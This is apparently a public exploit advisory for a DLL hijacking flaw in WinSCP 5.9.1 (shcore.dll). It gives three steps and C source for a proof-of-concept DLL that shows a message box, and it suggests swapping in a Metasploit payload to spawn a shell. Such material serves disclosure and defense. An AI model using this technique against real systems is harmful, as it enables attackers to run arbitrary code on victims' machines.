WinSCP 5.9.1 DLL Hijacking

`# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll)  
# Date: 03-09-2016  
# Author: Ashiyane Digital Security Team  
# Vendor Homepage:http://winscp.net/  
# Software Link:  
http://winscp.net/download/WinSCP-5.9.1-Setup.exe  
# Version:5.9.1  
# Tested on:Windows 7  
# Exploit by : Amir.ght  
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#  
Vuln DLL: shcore.dll  
WinSCP is an open source free SFTP client, FTP client, WebDAV client  
and SCP client for Windows.  
Its main function is file transfer between a local and a remote computer.  
WinSCP.exe will search for an load any DLL named "shcore.dll".  
If an attacker can place the DLL in a location  
where victim open WinSCP.exe it will load and run the attackers DLL  
and code.  
also can generate a msfpayload DLL and spawn a shell, for example.  
  
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+  
# Exploit:  
  
1- Save and compile below C code as 'shcore.dll' to create vuln DLL  
  
2- Place 'shcore.dll' on Same Directory of WinSCP  
  
3- Open WinSCP.exe  
  
//gcc test.c -o shcore.dll -shared  
//this dll show a message box  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
dll_hijack();  
return 0;  
}  
  
int dll_hijack()  
{  
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);  
return 0;  
}  
#################################  
Discovered By : Amir.ght #######  
#################################  
`